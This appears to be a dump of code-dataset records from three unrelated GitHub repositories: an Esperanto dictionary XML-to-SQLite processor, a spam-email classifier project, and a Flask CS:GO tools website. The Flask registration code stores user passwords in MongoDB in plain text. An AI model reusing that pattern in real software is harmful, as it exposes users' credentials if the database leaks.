x[\"lng\"])\n entries_per_lang = {}\n for lng, g in itertools.groupby(translations, key=lambda x: x[\"lng\"]):\n count = len(list(g))\n if count >= min_entries_to_include_lang:\n print(lng, count)\n entries_per_lang[lng] = 
count\n\n write_stats(entries_per_lang)\n\n create_langs_tables(cursor, entries_per_lang)\n translations = [t for t in translations if t[\"lng\"] in entries_per_lang]\n insert_translations(translations, cursor)\n\n\ndef main(\n word: Optional[str],\n xml_file: Optional[str],\n output_db: str,\n limit: Optional[int],\n verbose: bool,\n dry_run: bool,\n min_entries_to_include_lang: int,\n) -> None:\n\n conn = create_db(os.path.join(output_dir(), output_db))\n cursor = conn.cursor()\n\n if not dry_run:\n create_disciplines_tables(cursor)\n\n entries: list[EntryDict] = []\n try:\n files = []\n if xml_file:\n files = [xml_file]\n else:\n base_dir = os.path.dirname(__file__)\n path = os.path.join(base_dir, \"..\", \"revo\", \"xml\", \"*.xml\")\n files = glob.glob(path)\n files.sort()\n\n num_article = 1\n for filename in files:\n if word and word not in filename:\n continue\n parsed_entries = parse_article(filename, num_article, verbose)\n entries += parsed_entries\n num_article += 1\n\n if limit and num_article >= limit:\n break\n\n if not dry_run:\n insert_entries(entries, cursor, min_entries_to_include_lang)\n create_index(cursor)\n create_version_table(cursor)\n finally:\n if not dry_run:\n conn.commit()\n cursor.close()\n conn.close()\n" }, { "alpha_fraction": 0.5572998523712158, "alphanum_fraction": 0.5808477401733398, "avg_line_length": 23.5, "blob_id": "1b5430ba32204db6d6428b414a6caafe297659b6", "content_id": "1124afe216b5796b5a733cbfdd9921ffdea5afe9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1279, "license_type": "no_license", "max_line_length": 81, "num_lines": 52, "path": "/eo_dicts/tests/test_process.py", "repo_name": "djuretic/praktika-vortaro-dicts", "src_encoding": "UTF-8", "text": "import os\nimport sqlite3\nimport pytest\nfrom ..utils import output_dir\nfrom ..cli import Vortaro\n\nTEST_DB = \"test.db\"\nXML_BASE_DIR = os.path.join(os.path.dirname(__file__), \"..\", \"..\", \"revo\", \"xml\")\n\n\n# source: https://github.com/pallets/click/issues/737#issuecomment-309231467\[email protected]\ndef vortaro():\n return Vortaro()\n\n\ndef db_file():\n return os.path.join(output_dir(), TEST_DB)\n\n\ndef test_process_subart(vortaro):\n vortaro.process_revo(\n output_db=TEST_DB, xml_file=os.path.join(XML_BASE_DIR, \"an.xml\")\n )\n\n conn = sqlite3.connect(db_file())\n cursor = conn.cursor()\n res = cursor.execute(\"SELECT words, mark, position from definitions\")\n assert list(res) == [\n (\"-an\", \"an.0\", 1),\n (\"anaro\", \"an.0aro\", 3),\n (\"aniĝi\", \"an.0igxi\", 4),\n (\"ano\", \"an.0o\", 2),\n ]\n\n\ndef test_process_subart_2(vortaro):\n vortaro.process_revo(\n output_db=TEST_DB, xml_file=os.path.join(XML_BASE_DIR, \"al.xml\")\n )\n\n conn = sqlite3.connect(db_file())\n cursor = conn.cursor()\n res = cursor.execute(\"SELECT word, definition_id from words\")\n assert list(res) == [\n (\"al\", 1),\n (\"aligi\", 2),\n (\"aliĝi\", 3),\n (\"aliĝilo\", 4),\n (\"malaliĝi\", 5),\n (\"realiĝi\", 6),\n ]\n" }, { "alpha_fraction": 0.6882352828979492, "alphanum_fraction": 0.7029411792755127, "avg_line_length": 20.25, "blob_id": "8ab814bf2f98a13350df06a8636052f6200a8f6d", "content_id": "509051720dd4cb78a61b6ff5476987c92778bd5d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "TOML", "length_bytes": 340, "license_type": "no_license", "max_line_length": 43, "num_lines": 16, "path": "/pyproject.toml", "repo_name": "djuretic/praktika-vortaro-dicts", "src_encoding": "UTF-8", "text": 
"[build-system]\nrequires = [\"setuptools\"]\nbuild-backend = \"setuptools.build_meta\"\n\n[project]\nname = \"eo_dicts\"\nversion = \"0.1\"\nrequires-python = \">=3.11\"\n\n[tool.setuptools.packages.find]\ninclude = [\"eo_dicts\"]\nexclude = [\"eo_dicts.tests\"]\n\n[project.scripts]\nprocess_revo = \"eo_dicts.process_revo:main\"\npraktika_vortaro = \"eo_dicts.cli:main\"\n" }, { "alpha_fraction": 0.7142857313156128, "alphanum_fraction": 0.7142857313156128, "avg_line_length": 13.125, "blob_id": "ad7588e1223f3484c63408692dce6f1cba3c19a5", "content_id": "42e147c715bf14e445da8b9fc4503d1da703b469", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 112, "license_type": "no_license", "max_line_length": 29, "num_lines": 8, "path": "/mypy.ini", "repo_name": "djuretic/praktika-vortaro-dicts", "src_encoding": "UTF-8", "text": "[mypy]\nexclude = build\n\n[mypy-fire.*]\nignore_missing_imports = true\n\n[mypy-lxml.*]\nignore_missing_imports = true" }, { "alpha_fraction": 0.5257560610771179, "alphanum_fraction": 0.5299102663993835, "avg_line_length": 33.388572692871094, "blob_id": "a3816aefaaea482e01a12549bea4f47decf1c1d8", "content_id": "f5e7f4997935fe1255959928d1b80b5b8b61a184", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6024, "license_type": "no_license", "max_line_length": 88, "num_lines": 175, "path": "/eo_dicts/parser/string_with_format.py", "repo_name": "djuretic/praktika-vortaro-dicts", "src_encoding": "UTF-8", "text": "from enum import Enum\n\n# not using tpying.Self because mypy doesn't support it yet\nfrom typing import Optional, Union\n\n\nclass Format(Enum):\n ITALIC = \"italic\"\n BOLD = \"bold\"\n # Example sentence\n EKZ = \"ekz\"\n # Headword\n TLD = \"tld\"\n # Example: GEOG POL\n UZO_FAKO = \"fako\"\n\n\nclass StringWithFormat:\n def __init__(self, string: Optional[str] = None):\n self.string = string or \"\"\n self.format: dict[str, list[tuple[int, int]]] = {}\n\n @classmethod\n def join(\n cls, string_list: list[\"StringWithFormat\"], separator: str\n ) -> \"StringWithFormat\":\n if len(string_list) == 0:\n return StringWithFormat()\n base = string_list[0]\n for n, string in enumerate(string_list[1:]):\n if n < len(string_list) - 1:\n base += separator\n base += string\n return base\n\n def add(\n self,\n other: Union[str, \"StringWithFormat\"],\n format_type: Optional[Format] = None,\n keep_whitespace=False,\n ) -> \"StringWithFormat\":\n # print('ADD', repr(self), repr(self.format), repr(other), format_type)\n if format_type and format_type.value not in self.format:\n self.format[format_type.value] = []\n\n if isinstance(other, StringWithFormat):\n assert format_type is None\n # first string length\n n = len(self.string)\n self.add(other.string, keep_whitespace=keep_whitespace)\n for fmt, fmt_list in other.format.items():\n if fmt not in self.format:\n self.format[fmt] = []\n\n if (\n self.format[fmt]\n and self.format[fmt][-1][-1] == n\n and fmt_list\n and fmt_list[0][0] == 0\n ):\n # merge two formats in one\n self.format[fmt][-1] = (self.format[fmt][-1][0], n + fmt_list[0][1])\n fmt_list = fmt_list[1:]\n self.format[fmt] += [(start + n, end + n) for (start, end) in fmt_list]\n else:\n if format_type:\n last_format = self.format[format_type.value]\n if last_format and last_format[-1][-1] == len(self.string):\n last_format[-1] = (\n last_format[-1][0],\n len(self.string) + len(other),\n )\n else:\n self.format[format_type.value].append(\n (len(self.string), 
len(self.string) + len(other))\n )\n self.string += other\n return self\n\n def add_italic(self, other: Union[str, \"StringWithFormat\"]) -> \"StringWithFormat\":\n return self.add(other, Format.ITALIC)\n\n def add_bold(self, other: Union[str, \"StringWithFormat\"]) -> \"StringWithFormat\":\n return self.add(other, Format.BOLD)\n\n def apply_format(\n self, format_type: Union[list[Format], Format, None]\n ) -> \"StringWithFormat\":\n if not format_type:\n return self\n if isinstance(format_type, (list, tuple)):\n for format_t in format_type:\n self.apply_format(format_t)\n else:\n if format_type and format_type.value not in self.format:\n self.format[format_type.value] = []\n self.format[format_type.value].append((0, len(self.string)))\n return self\n\n def __add__(self, other: Union[str, \"StringWithFormat\"]) -> \"StringWithFormat\":\n return self.add(other)\n\n def prepend(self, other: str) -> \"StringWithFormat\":\n alt = StringWithFormat(other).add(self)\n self.string = alt.string\n self.format = alt.format\n return self\n\n def strip(self) -> \"StringWithFormat\":\n original = self.string\n base_len = len(original)\n new_format = dict(self.format)\n\n new_string = original.rstrip()\n if len(new_string) != base_len:\n for key in new_format:\n new_format[key] = [\n (a, min(len(new_string), b)) for (a, b) in new_format[key]\n ]\n\n base_len = len(new_string)\n new_string = new_string.lstrip()\n if len(new_string) != base_len:\n dif = base_len - len(new_string)\n for key in new_format:\n new_format[key] = [\n (max(0, a - dif), max(0, b - dif)) for (a, b) in new_format[key]\n ]\n\n new_string_format = StringWithFormat(new_string)\n new_string_format.format = new_format\n return new_string_format\n\n def encode_format(self) -> str:\n encoded = []\n for fmt, values in self.format.items():\n tmp_list = [\"%s,%s\" % item for item in values]\n encoded.append(\"%s:%s\" % (fmt, \";\".join(tmp_list)))\n return \"\\n\".join(encoded)\n\n def __eq__(self, other) -> bool:\n if isinstance(other, StringWithFormat):\n return self.string == other.string and self.format == other.format\n return False\n\n def __repr__(self) -> str:\n return \"<%s %s>\" % (self.__class__.__name__, repr(self.string))\n\n def __len__(self) -> int:\n return len(self.string)\n\n\ndef expand_tld(string: StringWithFormat) -> StringWithFormat:\n if not isinstance(string, StringWithFormat) or not string.format.get(\n Format.TLD.value\n ):\n return string\n boundaries = \" \\n:;;.,•?!()[]{}'\\\"„“\"\n original_format = string.format[Format.TLD.value]\n new_format = []\n for start, end in original_format:\n for i in range(start, -1, -1):\n if string.string[i] in boundaries:\n break\n start = i\n for i in range(end, len(string.string)):\n end = i\n if string.string[i] in boundaries:\n break\n else:\n end = len(string.string)\n new_format.append((start, end))\n\n string.format[Format.TLD.value] = new_format\n return string\n" } ]
17
Shashank-tech9/Advanced-Machine-Learning-Project
https://github.com/Shashank-tech9/Advanced-Machine-Learning-Project
f8c282c8f1d84bc451cfdf6b77d233d1802ad63e
c03afdbcbec25c792182f331f1edfecb677c42d4
d753aacf2489fb05dbc60e1f54c7c4e0be78151d
refs/heads/master
2020-09-21T13:23:44.646431
2019-12-04T21:51:05
2019-12-04T21:51:05
224,801,004
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5826917290687561, "alphanum_fraction": 0.5968586206436157, "avg_line_length": 26.508474349975586, "blob_id": "5ba1aa3d5c04e6ec761499382766b4146806ddde", "content_id": "b8e89146eb57ef5676a87e0648c0c770f0d68629", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3247, "license_type": "no_license", "max_line_length": 119, "num_lines": 118, "path": "/load_all_data.py", "repo_name": "Shashank-tech9/Advanced-Machine-Learning-Project", "src_encoding": "UTF-8", "text": "import numpy as np\nimport re\nimport nltk\nfrom sklearn.datasets import load_files\nnltk.download('stopwords')\nimport pickle\nfrom nltk.corpus import stopwords\nnltk.download('wordnet')\nfrom nltk.stem import WordNetLemmatizer\n\ndef load_all_data(num_feature):\n\n movie_data = load_files(r\"./data_email/email_train\")\n X, y = movie_data.data, movie_data.target\n \n #print(\"X\", len(X));\n #print(\"y\", y.shape);\n #print(\"y\", y[0:20]);\n #print(\"X[0] \", X[0]);\n \n documents = []\n \n #nltk.download('wordnet')\n #from nltk.stem import WordNetLemmatizer\n \n stemmer = WordNetLemmatizer()\n \n for sen in range(0, len(X)):\n # Remove all the special characters\n document = re.sub(r'\\W+', ' ', str(X[sen]))\n \n # remove all single characters\n document = re.sub(r'\\s+[a-zA-Z]\\s+', ' ', document)\n \n # Remove single characters from the start\n document = re.sub(r'\\^[a-zA-Z]\\s+', ' ', document) \n \n # Substituting multiple spaces with single space\n document = re.sub(r'\\s+', ' ', document, flags=re.I)\n \n # Removing prefixed 'b'\n document = re.sub(r'^b\\s+', '', document)\n \n # Converting to Lowercase\n document = document.lower()\n \n # Lemmatization\n document = document.split()\n \n document = [stemmer.lemmatize(word) for word in document]\n document = ' '.join(document)\n \n documents.append(document)\n \n from sklearn.feature_extraction.text import CountVectorizer\n \n #print(\"document[0] \", documents[0])\n \n vectorizer = CountVectorizer(max_features=num_feature, min_df=5, max_df=0.7, stop_words=stopwords.words('english'))\n X = vectorizer.fit_transform(documents).toarray()\n \n #print(\"X\", len(X));\n #print(\"X[0]\", len(X[0]));\n #print(\"X[0]\", X[0])\n #print(\"vectorizer\", vectorizer)\n \n #from sklearn.feature_extraction.text import TfidfTransformer\n #tfidfconverter = TfidfTransformer()\n #X = tfidfconverter.fit_transform(X).toarray()\n \n #X = np.array(X)\n\n #X = np.transpose(X)\n #\n #print(\"X.shape\", X.shape)\n #print(\"y.shape\", y.shape)\n #\n ##y = np.invert(y)\n #\n ##np_ones = np.ones({y.shape});\n #\n ##y = (y*2) - (np_ones);\n #\n #collections_y = collections.Counter(y)\n #\n #print(\"collections_y\", collections_y)\n\n #train_data = X[:, 0:4000]\n #train_labels = y[0:4000]\n\n #test_data = X[:,4001:]\n #test_labels = y[4001:]\n\n #num_words = X.shape[1]\n #num_training = train_labels.shape[0]\n #num_testing = test_labels.shape[0]\n\n #print(\"train_data_shape\", train_data.shape);\n #print(\"test_data_shape\", test_data.shape);\n\n #print(\"train_labels_shape\", train_labels.shape);\n #print(\"test_labels_shape\", test_labels.shape);\n\n #print(\"num_words\", num_words);\n #print(\"num_testing\", num_testing);\n #print(\"num_training\", num_training);\n\n return X, y\n\n\n \n\n#load_all_data(10)\n \n \n #from sklearn.feature_extraction.text import TfidfVectorizer\n #tfidfconverter = TfidfVectorizer(max_features=1500, min_df=5, max_df=0.7, stop_words=stopwords.words('english'))\n #X = 
tfidfconverter.fit_transform(documents).toarray()\n\n" }, { "alpha_fraction": 0.6393638253211975, "alphanum_fraction": 0.6477137207984924, "avg_line_length": 31.230770111083984, "blob_id": "75cdd4fef9841c01a09ad8c5957bf5c3e69ca813", "content_id": "b1fccab49207fc4468dfd71c0de9ac4f31b4193a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2515, "license_type": "no_license", "max_line_length": 99, "num_lines": 78, "path": "/naive_bayes.py", "repo_name": "Shashank-tech9/Advanced-Machine-Learning-Project", "src_encoding": "UTF-8", "text": "\"\"\"This module includes methods for training and predicting using naive Bayes.\"\"\"\nimport numpy as np\nimport math as math\n\n\ndef naive_bayes_train(train_data, train_labels, params):\n \"\"\"Train naive Bayes parameters from data.\n\n :param train_data: d x n numpy matrix (ndarray) of d binary features for n examples\n :type train_data: ndarray\n :param train_labels: length n numpy vector with integer labels\n :type train_labels: array_like\n :param params: learning algorithm parameter dictionary. Must include an 'alpha' value\n :type params: dict\n :return: model learned with the priors and conditional probabilities of each feature\n :rtype: model\n \"\"\"\n # TODO: INSERT YOUR CODE HERE TO LEARN THE PARAMETERS FOR NAIVE BAYES\n\n alpha = params['alpha']\n #alpha = 1e-5\n\n labels = np.unique(train_labels)\n\n d, n = train_data.shape\n num_classes = labels.size\n\n cond_prb = np.ones(shape =(num_classes, d+1))\n\n for i in range(0,num_classes):\n current_label = labels[i]\n num_current_label = np.sum(train_labels == labels[i])\n current_label_prb = (num_current_label + alpha) / (n + num_classes*alpha)\n cond_prb[i, 0] = current_label_prb\n\n for i in range(0,num_classes):\n num_y = np.sum(train_labels == labels[i])\n data_with_label = train_data[:, train_labels == labels[i]]\n num_y_and_x = data_with_label.dot(np.ones(data_with_label.shape[1]))\n\n cond_prb[i,1:] = (num_y_and_x + alpha) / (num_y + (2*alpha))\n\n model = cond_prb\n\n return model\n\n\ndef naive_bayes_predict(data, model):\n \"\"\"Use trained naive Bayes parameters to predict the class with highest conditional likelihood.\n\n :param data: d x n numpy matrix (ndarray) of d binary features for n examples\n :type data: ndarray\n :param model: learned naive Bayes model\n :type model: dict\n :return: length n numpy array of the predicted class labels\n :rtype: array_like\n \"\"\"\n # TODO: INSERT YOUR CODE HERE FOR USING THE LEARNED NAIVE BAYES PARAMETERS\n # TO CLASSIFY THE DATA\n\n d,n = data.shape\n prediction = np.ones(n)\n num_classes = model.shape[0]\n\n cond_prb = model[:,1:];\n not_cond_prb = 1-cond_prb\n\n cond_prb = np.log(cond_prb)\n not_cond_prb = np.log(not_cond_prb)\n\n for i in range(0,n):\n feature_i = data[:,i]\n t1 = np.dot(cond_prb, feature_i)\n t2 = np.dot(not_cond_prb, 1-feature_i)\n t3 = (t1+t2)+np.log(model[:,0])\n prediction[i] = t3.argmax()\n\n return prediction\n\n" }, { "alpha_fraction": 0.6041204333305359, "alphanum_fraction": 0.617443859577179, "avg_line_length": 36.01369857788086, "blob_id": "2ca28f3739b96b3b5a3ff58b2214c6116f1b8a5b", "content_id": "97287d5a2b1900ab98dbfa510c0ba54ac5428fde", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 8106, "license_type": "no_license", "max_line_length": 188, "num_lines": 219, "path": "/README.md", "repo_name": "Shashank-tech9/Advanced-Machine-Learning-Project", "src_encoding": "UTF-8", "text": "# 
Advanced-Machine-Learning-Project\nFinal Project for the course \"Advanced Machine Learning\".\n\nIn this project we aim to classify spam messages from 2 datasets of emails, using Four algorithms: \n1) Naive Bayes\n2) Muli level perceptron \n3) Support Vector Machine and \n4) Relevance Vector Machine\n# Databases \nThe fopllowing the are the databases which we used :\n\ndata_email\n\nWe have used the following libraries:\n\nSklearn\n\nquadprog\n# Jupyter Notebook code\n```\nimport numpy as np\n#from decision_tree import calculate_information_gain\n#from decision_tree import decision_tree_train\n#from decision_tree import decision_tree_predict\n#from decision_tree import recursive_tree_train\nfrom scipy.io import loadmat\nfrom naive_bayes import naive_bayes_train, naive_bayes_predict\nfrom load_all_data import *\nfrom manipulate_data_nb import *\nfrom manipulate_data_mlp import *\nfrom manipulate_data_svm import *\nfrom manipulate_data_rvm import *\nfrom crossval import cross_validate\nfrom mlp import mlp_train, mlp_predict, logistic, nll\nfrom kernelsvm import kernel_svm_train, kernel_svm_predict\nfrom skrvm import RVC\nfrom sklearn.datasets import load_iris\nimport matplotlib.pyplot as plt\nimport copy\n```\n\nWe test each of the 4 algorithms for 6 values of feature size \n```\nfeature_size = [25, 50, 75, 100, 125, 150]\n#feature_size = [25]\n\nnb_test_accuracy1 = [None] * len(feature_size)\nnb_train_accuracy1 = [None] * len(feature_size)\n\nmlp_test_accuracy1 = [None] * len(feature_size)\nmlp_train_accuracy1 = [None] * len(feature_size)\n\nsvm_test_accuracy1 = [None] * len(feature_size)\nsvm_train_accuracy1 = [None] * len(feature_size)\n\nrvm_test_accuracy1 = [None] * len(feature_size)\nrvm_train_accuracy1 = [None] * len(feature_size)\n\n\n\nX = [None] * len(feature_size)\ny = [None] * len(feature_size)\n\nfor i in range(len(feature_size)):\n X[i], y[i] = load_all_data(feature_size[i])\n```\n\nAccuracy Test for Naive-Bayes\n```\nnb_params = { 'alpha': 1.0 }\n\nfor i in range(len(feature_size)):\n num_words_nb, num_training_nb, num_testing_nb, train_data_nb, test_data_nb, train_labels_nb, test_labels_nb = manipulate_data_nb(copy.deepcopy(X[i]), copy.deepcopy(y[i]))\n \n #print(\"test_labels\", test_labels_nb);\n #print(\"teat_data\", test_data_nb[0:20,0:20]) \n \n nb_model = naive_bayes_train(train_data_nb, train_labels_nb, nb_params)\n \n print(\"Feature size: %d\" % feature_size[i])\n \n nb_train_predictions = naive_bayes_predict(train_data_nb, nb_model)\n nb_train_accuracy = np.mean(nb_train_predictions == train_labels_nb)\n print(\"Naive Bayes training accuracy: %f\" % nb_train_accuracy)\n \n nb_test_predictions = naive_bayes_predict(test_data_nb, nb_model)\n nb_test_accuracy = np.mean(nb_test_predictions == test_labels_nb)\n print(\"Naive Bayes testing accuracy: %f\" % nb_test_accuracy)\n \n nb_test_accuracy1[i] = nb_test_accuracy\n nb_train_accuracy1[i] = nb_train_accuracy\n```\n\nAccuracy test for Multi level Perceptron\n```\nnum_folds = 4\nstructures = [[3]]\nlambda_vals = [0.01, 0.1]\nparams = {\n 'max_iter': 10000,\n #'max_iter': 100,\n 'squash_function': logistic,\n 'loss_function': nll\n}\n \nbest_params = []\nbest_score = 0\nfor i in range(len(feature_size)):\n num_words_mlp, num_training_mlp, num_testing_mlp, train_data_mlp, test_data_mlp, train_labels_mlp, test_labels_mlp = manipulate_data_mlp(copy.deepcopy(X[i]), copy.deepcopy(y[i]))\n #print(\"test_labels\", test_labels_mlp[0:20]);\n #print(\"teat_data\", test_data_mlp[0:20,0:20]) \n \n for j in range(len(structures)):\n 
for k in range(len(lambda_vals)):\n params['num_hidden_units']= structures[j]\n params['lambda'] = lambda_vals[k]\n #print(\"lambda\", lambda_vals[k]);\n #print(\"structure\", structures[j]);\n \n cv_score, models = cross_validate(mlp_train, mlp_predict, train_data_mlp, train_labels_mlp, num_folds, params)\n \n #print(\"cv_score\", cv_score);\n \n if cv_score > best_score:\n best_score = cv_score\n best_params = copy.copy(params)\n \n print(\"Feature size: %d\" % feature_size[i])\n \n mlp_model = mlp_train(train_data_mlp, train_labels_mlp, best_params)\n predictions, _, _, _ = mlp_predict(test_data_mlp, mlp_model)\n test_accuracy = np.mean(predictions == test_labels_mlp)\n \n print(\"MLP had test accuracy %f\" % (test_accuracy))\n \n predictions, _, _, _ = mlp_predict(train_data_mlp, mlp_model)\n train_accuracy = np.mean(predictions == train_labels_mlp)\n print(\"MLP had train accuracy %f\" % (train_accuracy))\n print(\"with structure %s and lambda = %f\" % (repr(best_params['num_hidden_units']), best_params['lambda']))\n \n mlp_test_accuracy1[i] = test_accuracy\n mlp_train_accuracy1[i] = train_accuracy\n ```\n\nAccuracy test for Support Vector Machine\n ```\n num_folds = 4\nc_vals = 10 ** np.linspace(-1, 3, 4)\nsigmas = np.linspace(0.1, 7, 15)\n#sigmas = [4.5]\nbest_params_svm = {\n 'kernel': 'rbf',\n 'C': c_vals[0],\n 'sigma': sigmas[0]\n }\nbest_score = 0\n\nfor i in range(len(feature_size)):\n num_words_svm, num_training_svm, num_testing_svm, train_data_svm, test_data_svm, train_labels_svm, test_labels_svm = manipulate_data_svm(copy.deepcopy(X[i]), copy.deepcopy(y[i]))\n\n #print(\"test_labels\", test_labels_svm[0:20]);\n #print(\"teat_data\", test_data_svm[0:20,0:20]); \n\n for j in range(len(c_vals)):\n for k in range(len(sigmas)):\n params = {\n 'kernel': 'rbf',\n 'C': c_vals[j],\n 'sigma': sigmas[k]\n }\n \n cv_score, _ = cross_validate(kernel_svm_train, kernel_svm_predict, train_data_svm, train_labels_svm, num_folds, params)\n \n print(\"cv_score\", cv_score);\n #print(j, \" | \", k);\n \n if cv_score > best_score:\n best_score = cv_score\n best_params_svm['kernel'] = params['kernel']\n best_params_svm['C'] = params['C']\n best_params_svm['sigma'] = params['sigma']\n \n print(\"Feature size: %d\" % feature_size[i])\n \n rbf_svm_model = kernel_svm_train(train_data_svm, train_labels_svm, best_params_svm)\n predictions, _ = kernel_svm_predict(test_data_svm, rbf_svm_model)\n test_accuracy = np.mean(predictions == test_labels_svm)\n \n print(\"RBF SVM had test accuracy %f\" % (test_accuracy))\n \n predictions, _ = kernel_svm_predict(train_data_svm, rbf_svm_model)\n train_accuracy = np.mean(predictions == train_labels_svm)\n \n print(\"RBF SVM had train accuracy %f\" % (train_accuracy))\n print(\"with C = %f, sigma = %f\" % (best_params_svm['C'], best_params_svm['sigma']))\n \n svm_test_accuracy1[i] = test_accuracy\n svm_train_accuracy1[i] = train_accuracy\n```\n\nAccuracy Test for RVM\n```\nfor i in range(len(feature_size)):\n #print(\"X[i]\", X[i].shape)\n #print(\"Y[i]\", y[i].shape)\n num_words_rvm, num_training_rvm, num_testing_rvm, train_data_rvm, test_data_rvm, train_labels_rvm, test_labels_rvm = manipulate_data_rvm(copy.deepcopy(X[i]), copy.deepcopy(y[i]))\n #print(\"train_data_rvm\", train_data_rvm.shape)\n #print(\"train_label_rvm\", train_labels_rvm.shape)\n clf = RVC(kernel='rbf', n_iter=10, n_iter_posterior=10, threshold_alpha=10000.0, verbose=False)\n clf.fit(train_data_rvm, train_labels_rvm)\n test_accuracy = clf.score(test_data_rvm, test_labels_rvm)\n print(\"Feature 
size: %d\" % feature_size[i])\n print(\"RBF RVM had test accuracy %f\" % (test_accuracy))\n train_accuracy = clf.score(train_data_rvm, train_labels_rvm)\n print(\"RBF RVM had train accuracy %f\" % (train_accuracy))\n \n rvm_test_accuracy1[i] = test_accuracy\n rvm_train_accuracy1[i] = train_accuracy\n ```\n" }, { "alpha_fraction": 0.6012104749679565, "alphanum_fraction": 0.6119704246520996, "avg_line_length": 23.78333282470703, "blob_id": "8d9db09c138962091b13e4b96e8cd0a8f4af022a", "content_id": "94cad280cfbc173ae337056d60cc434db2b27bf7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1487, "license_type": "no_license", "max_line_length": 97, "num_lines": 60, "path": "/manipulate_data_svm.py", "repo_name": "Shashank-tech9/Advanced-Machine-Learning-Project", "src_encoding": "UTF-8", "text": "import numpy as np\n#import re\n#import nltk\nfrom sklearn.datasets import load_files\n#import pickle\n#from nltk.corpus import stopwords\nimport collections\n\ndef manipulate_data_svm(X, y):\n #from sklearn.feature_extraction.text import TfidfTransformer\n #tfidfconverter = TfidfTransformer()\n #X = tfidfconverter.fit_transform(X).toarray()\n\n X = np.array(X)\n\n X = np.transpose(X)\n \n #print(\"X.shape\", X.shape)\n #print(\"y.shape\", y.shape)\n \n #y = np.invert(y)\n \n #np_ones = np.ones({y.shape});\n \n #y = (y*2) - (np_ones);\n\n for i in range(y.shape[0]):\n if(y[i]<=0):\n y[i] = -1;\n else:\n y[i] = 1;\n\n \n #collections_y = collections.Counter(y)\n \n #print(\"collections_y\", collections_y)\n\n train_count = int(len(y)*0.667);\n\n train_data = X[:, 0:train_count]\n train_labels = y[0:train_count]\n\n test_data = X[:,(train_count+1):]\n test_labels = y[(train_count+1):]\n\n num_words = X.shape[1]\n num_training = train_labels.shape[0]\n num_testing = test_labels.shape[0]\n\n #print(\"train_data_shape\", train_data.shape);\n #print(\"test_data_shape\", test_data.shape);\n\n #print(\"train_labels_shape\", train_labels.shape);\n #print(\"test_labels_shape\", test_labels.shape);\n\n #print(\"num_words\", num_words);\n #print(\"num_testing\", num_testing);\n #print(\"num_training\", num_training);\n\n return num_words, num_training, num_testing, train_data, test_data, train_labels, test_labels\n" } ]
4
MyFaith/flask-csgo-tools
https://github.com/MyFaith/flask-csgo-tools
32454f73c64328d2a76e81bc2b62676c0a2bc47d
dcc79400b07c367efce9a7bc2b482ccc816ef9c2
854547bb3aeef47f806f5130930585afd0c3561d
refs/heads/master
2019-03-18T10:20:07.546685
2017-04-27T12:42:45
2017-04-27T12:42:45
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5509889721870422, "alphanum_fraction": 0.5534292459487915, "avg_line_length": 26.71174430847168, "blob_id": "564b3eb61605ad85a0c76e84cfbe3d53dc99d995", "content_id": "9a1971cc99b88c030042716297137e70f3016274", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8076, "license_type": "permissive", "max_line_length": 103, "num_lines": 281, "path": "/app/views.py", "repo_name": "MyFaith/flask-csgo-tools", "src_encoding": "UTF-8", "text": "# coding: utf-8\n\nfrom app import app, db, redirect, render_template, session, url_for\nfrom bson import ObjectId\nfrom app.forms import register_form, login_form, admin_login_form, admin_article_form, comment_add_form\nimport time, pymongo\n\n# type 1:Article 2:Video\n\n# 获取当前时间\ndef get_time():\n now_time = time.strftime('%Y-%m-%d %X', time.gmtime(time.time()))\n return now_time\n\n# 404\n@app.errorhandler(404)\ndef page_not_found(error):\n return render_template('404.html'), 404\n\n# 首页\n@app.route('/')\ndef index():\n article = db.Article.find().sort('sendtime', pymongo.DESCENDING)\n return render_template('index.html', article=article)\n\n# 文章页\n@app.route('/article')\ndef article():\n article = db.Article.find({\n 'type': '1'\n }).sort('sendtime', pymongo.DESCENDING)\n return render_template('article.html', article=article)\n\n# 视频页\n@app.route('/video')\ndef video():\n article = db.Article.find({\n 'type': '2'\n }).sort('sendtime', pymongo.DESCENDING)\n return render_template('video.html', article=article)\n\n# 工具箱\n@app.route('/toolbox')\ndef tool():\n return render_template('toolbox.html')\n\n# 查看文章页\n@app.route('/view/<id>', methods=['GET', 'POST'])\ndef view(id):\n oid = ObjectId(id)\n form = comment_add_form()\n article = db.Article.find_one({\n '_id': oid\n })\n if form.validate_on_submit():\n # 添加评论\n user = db.User.find_one({'username': session['login_status']})\n username = session['login_status']\n content = form.content.data\n avatar = user['avatar']\n sendtime = get_time()\n comments = article['comments']\n # 设置评论集合\n comments.append({\n 'username': username,\n 'content': content,\n 'avatar': avatar,\n 'sendtime': sendtime\n })\n # 更新\n db.Article.update({\n '_id': oid\n },{\n '$set': {\n 'comments': comments\n }\n })\n return redirect('/view/%s'%id)\n else:\n # 增加阅读\n readed = int(article['readed']) + 1\n db.Article.update({\n '_id': oid\n }, {\n '$set': {\n 'readed': readed\n }\n })\n return render_template('view.html', title=article['title'], article=article, form=form)\n\n# 贴纸生成\n@app.route('/sticker')\ndef sticker():\n return render_template('toolbox/sticker.html')\n\n# 按键绑定\n@app.route('/keybind')\ndef keybind():\n return render_template('toolbox/keybind.html')\n\n# 个人资料生成\n@app.route('/profile')\ndef profile():\n return render_template('toolbox/profile.html')\n\n# 注册\n@app.route('/register', methods=['GET', 'POST'])\ndef register():\n form = register_form()\n if form.validate_on_submit():\n # 注册\n username = form.username.data\n password = form.password.data\n repassword = form.repassword.data\n email = form.email.data\n reg_time = get_time()\n avatar = '/static/images/steam_avatar.jpg'\n # 查询是否已存在\n query_result = db.User.find_one({\n 'username': username\n })\n if(query_result):\n # 存在\n form.username.errors.append('用户名已存在')\n return render_template('user/register.html', form=form)\n else:\n db.User.insert({\n 'username': username,\n 'password': password,\n 'repassword': repassword,\n 'email': 
